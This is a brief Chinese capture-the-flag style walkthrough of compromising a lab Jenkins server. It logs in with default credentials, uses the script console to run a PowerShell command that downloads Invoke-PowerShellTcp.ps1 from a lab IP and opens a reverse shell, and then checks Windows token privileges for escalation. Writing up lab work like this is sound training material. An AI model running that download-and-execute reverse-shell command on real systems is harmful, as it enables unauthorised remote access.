简介:
利用 Jenkins 获取初始 shell,然后利用 Windows 身份验证令牌提升您的权限。
Task 1
简单nmap扫一扫
可以看出开了三个端口
访问8080,来到Jenkins的登录口,尝试密码 admin admin 成功登录
jenkins后台有个能shell的点,在manage里面
下面翻到脚本管理器
输入以下代码:
println "powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.234.74:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.234.74 -Port 4646".execute().text
成功反弹shell
成功找到flag
根据提示反弹一个msf的shell
查看特权令牌
这里发现SeDebugPrivilege SeChangeNotifyPrivilege和SeImpersonatePrivilege的SeCreateGlobalPrivilege状态设置为“已启用”。
后续就跟着步骤来
Comments NOTHING